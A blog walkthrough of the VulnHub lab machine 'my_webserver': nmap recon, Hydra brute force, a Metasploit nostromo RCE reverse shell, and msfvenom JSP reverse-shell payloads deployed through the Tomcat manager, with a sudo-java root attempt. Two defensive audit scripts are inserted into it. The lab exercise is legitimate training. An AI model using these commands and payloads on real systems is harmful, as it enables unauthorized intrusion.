VulnHub: my_webserver

I. Information gathering

1. Sweep the /24 subnet to find the target's IP

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.62.129/24                       
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:55 HKT
Nmap scan report for 192.168.62.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.62.2
Host is up (0.00019s latency).
MAC Address: 00:50:56:F4:60:0B (VMware)
Nmap scan report for 192.168.62.130
Host is up (0.00047s latency).
MAC Address: 00:0C:29:39:83:54 (VMware)
Nmap scan report for 192.168.62.254
Host is up (0.00038s latency).
MAC Address: 00:50:56:EB:19:29 (VMware)
Nmap scan report for 192.168.62.129
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds

  Since I know the IPs on this LAN well, 192.168.62.130 is clearly the newly added target machine.

2. Scan the target's open ports

① TCP ports

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:57 HKT
Nmap scan report for 192.168.62.130
Host is up (0.0022s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
8081/tcp open  blackice-icecap
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

② UDP ports

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 192.168.62.130 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 00:00 HKT
Warning: 192.168.62.130 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.130
Host is up (0.00053s latency).
All 65535 scanned ports on 192.168.62.130 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.87 seconds
Service versions on the open ports:

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ sudo nmap -sV -sT -O -p22,80,2222,3306,8009,8080,8081 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 23:45 HKT
Nmap scan report for 192.168.62.130
Host is up (0.00068s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
2222/tcp open  http    nostromo 1.9.6
3306/tcp open  mysql   MySQL (unauthorized)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open  http    nginx 1.14.2
MAC Address: 00:0C:29:39:83:54 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.39 seconds

③ Basic vulnerability scan of the open ports

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,2222,3306,8009,8080,8081 192.168.62.130
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-08 23:16 HKT
Nmap scan report for 192.168.62.130
Host is up (0.00055s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-wordpress-users:
| Username found: ap20dsero039
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.62.130
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://192.168.62.130:80/
|     Form id: s1
|_    Form action: http://www.armour.local/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /wp-login.php: Possible admin folder
|   /wp-json: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2
|   /: WordPress version: 5.3.14
|   /feed/: Wordpress version: 5.3.14
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|_  /0/: Potentially interesting folder
2222/tcp open  EtherNetIP-1
3306/tcp open  mysql
8009/tcp open  ajp13
8080/tcp open  http-proxy
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible. It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum:
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|_  /docs/: Potentially interesting folder
8081/tcp open  blackice-icecap
MAC Address: 00:0C:29:39:83:54 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 70.14 seconds


II. Getting a shell

1. Port 22

① Search for known vulnerabilities in this version: none

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ searchsploit OpenSSH 7.9p1 Debian 10+deb10u2                        
Exploits: No Results
Shellcodes: No Results

② Quick brute-force attempt: nothing

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l webserver -P rockyou.txt 192.168.62.130 ssh -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:38:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.62.130:22/
[ERROR] target ssh://192.168.62.130:22/ does not support password authentication (method reply 4).                                                                                                   

3. Exploiting port 2222

  ① Search for known vulnerabilities in the service on port 2222

msf6 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec

  ② An RCE module is found; try it

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/nostromo_code_exec) > option
[-] Unknown command: option
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.62.130
rhosts => 192.168.62.130
msf6 exploit(multi/http/nostromo_code_exec) > set rport 2222
rport => 2222
msf6 exploit(multi/http/nostromo_code_exec) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/http/nostromo_code_exec) > options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.62.130   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    2222             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.62.129   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 192.168.62.129:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.62.129:4444 -> 192.168.62.130:53560) at 2023-02-05 18:05:01 +0800

id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
daemon@webserver:/usr/bin$

  Got a shell!!!!

4. Port 3306 (my own extra attempt)

① Quick brute-force attempt: MySQL appears to have a host allow-list enabled

┌──(kali㉿kali)-[/usr/share/wordlists]
└─$ hydra -l root -P rockyou.txt 192.168.62.130 mysql -f
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:41:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://192.168.62.130:3306/
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
[ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server

5. 8008

6. Exploiting port 8080

  Open http://ip:port in a browser to see what the machine is serving; since it is running Tomcat, locate the manager (admin) URL:


III. Privilege escalation

1. Gather system information

daemon@webserver:/usr/bin$ ls -l /etc/crontab
ls -l /etc/crontab
-rw-r--r-- 1 root root 1042 Oct 11  2019 /etc/crontab
daemon@webserver:/usr/bin$ ls -l /etc/passwd
ls -l /etc/passwd
-rw-r--r-- 1 root root 1447 Mar 31  2020 /etc/passwd
daemon@webserver:/usr/bin$ sudo -l
sudo -l


sudo: unable to resolve host webserver: Name or service not known

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

② Look for writable files named like users.xml (the unquoted glob in the grep pattern is dropped so the shell does not expand it):

find / -writable -type f 2>/dev/null | grep users.xml


③ The Tomcat user configuration file is found and read, which gives the username and password for the Tomcat manager
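A defender-side check for what step ③ relies on, written here as an added example (not code from the target, the walkthrough or Tomcat): it audits a tomcat-users.xml for permissions that let unprivileged users read or write it, for accounts holding deploy-capable manager roles, and for plaintext passwords. The sample file and its placeholder credentials are constructed, PRIVILEGED_ROLES is a hand-picked set, and the digest regex follows Tomcat's `salt$iterations$digest` storage format.

```python
#!/usr/bin/env python3
"""Audit a tomcat-users.xml for loose permissions, manager roles and plaintext passwords."""
import os
import re
import stat
import tempfile
import xml.etree.ElementTree as ET

# Roles that allow deploying applications through the Manager app (i.e. code execution).
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui", "admin-script"}

# Tomcat's MessageDigestCredentialHandler stores "salt$iterations$digest" or a bare hex digest;
# anything else is treated as plaintext (heuristic).
DIGEST_RE = re.compile(r"^(?:[0-9a-f]+\$\d+\$)?[0-9a-f]{32,}$")

# Constructed sample file; the credentials are placeholders, not values from the target.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="PLACEHOLDER_PLAINTEXT" roles="manager-gui,manager-script"/>
  <user username="monitor" password="0123456789abcdef0123456789abcdef" roles="manager-status"/>
</tomcat-users>
"""


def local_name(tag):
    """Drop the namespace prefix that ElementTree attaches ({uri}user -> user)."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(path):
    """Return a list of human-readable findings for the given tomcat-users.xml."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("file is readable by group/others (mode %04o)" % mode)
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("file is writable by group/others (mode %04o)" % mode)

    for el in ET.parse(path).getroot().iter():
        if local_name(el.tag) != "user":
            continue
        name = el.get("username", "?")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged:
            findings.append(f"user {name!r} holds deploy-capable role(s) {privileged}")
        password = el.get("password", "")
        if password and not DIGEST_RE.match(password):
            findings.append(f"user {name!r} has a plaintext password")
    return findings


def write_sample(mode=0o644):
    """Write the constructed sample to a temp file with the given mode; return its path."""
    fd, path = tempfile.mkstemp(suffix="-tomcat-users.xml")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_XML)
    os.chmod(path, mode)
    return path


if __name__ == "__main__":
    sample = write_sample()
    for finding in audit_tomcat_users(sample):
        print("-", finding)
    os.unlink(sample)
```

Run it against the real file with `audit_tomcat_users("/path/to/tomcat-users.xml")`; an empty list means the file is owner-only and every password is digested.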


④ Log in to the Tomcat manager; it has a file upload (deploy) function


⑤ Generate the reverse-shell package with msfvenom

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=8888 -f jar > doit.war 

⑥ Upload the generated file in the Tomcat manager; once it is deployed, click its name (the one in the red box) to run it


⑦ In msf, set LHOST, LPORT and PAYLOAD (the same values used when generating the payload), listen on the port the payload connects back to, then run

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.62.129:8888
[*] Command shell session 1 opened (192.168.62.129:8888 -> 192.168.62.130:58322) at 2023-02-05 22:36:47 +0800

python -c 'import pty;pty.spawn("/bin/bash")'          // use python to get a proper interactive shell
tomcat@webserver:~$

⑧ Check the tomcat user's sudo rights: it may run the java binary as root.

tomcat@webserver:/tmp$ sudo -l
sudo -l
sudo: unable to resolve host webserver: Name or service not known
Matching Defaults entries for tomcat on webserver:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomcat may run the following commands on webserver:
    (ALL) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
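To catch rules like this one during an audit, here is an added script (not from the walkthrough or any tool it uses) that parses `sudo -l` output and flags rules that carry NOPASSWD or point at a binary that executes arbitrary code by design, which is what makes `java -jar` as root equivalent to root. The SAMPLE text is the output shown above plus one constructed benign rule, and CODE_RUNNERS is a hand-picked, non-exhaustive list.

```python
#!/usr/bin/env python3
"""Parse `sudo -l` output and flag rules that are effectively 'root without a password'."""
import re

# Programs that execute arbitrary code or spawn a shell by design: a sudo rule on any of
# them is equivalent to granting ALL. Matched on the basename of the allowed binary.
CODE_RUNNERS = {"java", "python", "python3", "perl", "ruby", "node", "bash", "sh",
                "vi", "vim", "less", "more", "find", "awk", "env"}

# The walkthrough's sudo -l output, plus a constructed benign rule on the last line.
SAMPLE = """Matching Defaults entries for tomcat on webserver:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User tomcat may run the following commands on webserver:
    (ALL) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
    (root) /usr/bin/systemctl restart tomcat9
"""

# One rule line looks like "(runas[:group]) TAG: TAG: command, command".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return one dict per allowed command: runas, set of tags (NOPASSWD, ...), cmd."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_cmds = True          # everything after this header is a rule line
            continue
        if not in_cmds:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            if cmd.strip():
                rules.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": cmd.strip()})
    return rules


def assess(rules):
    """Return (cmd, runas, issues) for every rule that deserves attention."""
    findings = []
    for r in rules:
        base = r["cmd"].split()[0].rsplit("/", 1)[-1]   # basename of the allowed binary
        issues = []
        if r["cmd"] == "ALL" or base in CODE_RUNNERS:
            issues.append("command runs arbitrary code")
        if "NOPASSWD" in r["tags"]:
            issues.append("no password required")
        if issues:
            findings.append((r["cmd"], r["runas"], issues))
    return findings


if __name__ == "__main__":
    for cmd, runas, issues in assess(parse_sudo_l(SAMPLE)):
        print(f"{cmd} (as {runas}): {', '.join(issues)}")
```

The fix on the host side is to replace the java rule with a rule on a fixed wrapper script that takes no arguments, or to run the service under a systemd unit instead of sudo.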

⑨ Generate a .jar payload with msfvenom

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=9999 -f jar >xiaoliyu.jar

⑩ Upload the jar to the target with the session's upload function (for some reason upload did not work for me, so I copied the file with scp instead)

⑪ Set up an msf listener on port 9999

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_
set payload java/jsp_shell_bind_tcp     set payload java/jsp_shell_reverse_tcp  
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > run

⑫ Run the .jar as root (for some reason this failed for me; online it is said the file gets corrupted in transfer, and transferring it with sftp did not help either, so I had to find another way to escalate; normally step ⑬ would then already be root)

sudo -u root java -jar xiaoliyu.jar

⑬ After the connection comes back, upgrade the shell with python; it is now running as root

⑭ Since ⑫ did not work, I searched for Linux privilege escalation methods and found that CVE-2021-4034 can be used:

CVE-2021-4034: Linux Polkit privilege escalation, reproduction and fix (Acczdy's blog on CSDN)


   This method can also be used right after the port 2222 exploit gives a shell.


posted @ 2023-02-06 00:38 by lalallalalal, 371 views, 0 comments